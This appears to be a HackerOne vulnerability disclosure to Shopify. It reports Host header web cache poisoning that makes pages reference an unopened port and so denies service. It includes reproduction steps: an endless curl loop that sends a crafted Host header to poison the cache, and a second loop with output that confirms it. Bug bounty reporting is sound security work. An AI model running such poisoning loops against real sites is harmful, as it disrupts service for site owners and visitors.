Shopify: Host header web cache poisoning lead to DoS

ID H1:1096609
Type hackerone
Reporter g4mm4
Modified 2021-04-08T19:40:19


Hi there, I just found the website: is infected with "Web cache poisoning" via HOST header lead to Denial of Services Abuse this bug, Attacker can:

Poison your cache with HTTP header Host header with arbitrary PORT which is not opened. This attack may lead to Denial of Services

How to reproduce the issue: In the 1st terminal, run command likes this:

$ while true; do curl -ik "" -H "Host:"|grep ":1337"; sleep 0;echo 1; done

In the 2nd terminal, run command below for confirmation this attack is successful or not:

$ while true; do curl -ik ""|grep ":1337"; done

and the output from command with be confirmed my Host header poisoning worked: $ while true; do curl -ik ""|grep ":1337"; done % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0 <link rel="canonical" href=""> <li><div class="popover-wrapper js-popover-dropdown popover-wrapper--dropdown" data-position="bottom" data-align="left"><button type="button" class="popover__trigger marketing-nav__item marketing-nav__item--primary" itemprop="name">Collections<svg class="icon marketing-nav__arrow" aria-hidden="true" focusable="false"> <use xlink:href="#modules-caret-down" /> </svg></button><div class="popover"><div class="popover__content"><ul class="popover__list"><li><a href="/collections/trending-themes" class="marketing-nav__item marketing-nav__item--child" itemprop="name" data-ga-event="Main Nav" data-ga-action="Clicked" data-ga-label="trending-themes">Trending this week </a></li><li><a href="/collections/product-recommendations" class="marketing-nav__item marketing-nav__item--child" itemprop="name" data-ga-e ........... +++

Finally, when user visits the homepage:, so many images, css, link will not be loaded (Because the port :1337 which appended is not opened Please see the attached image for details.

cheers, ~g4mm4 References: Denial of Services


Denial of Services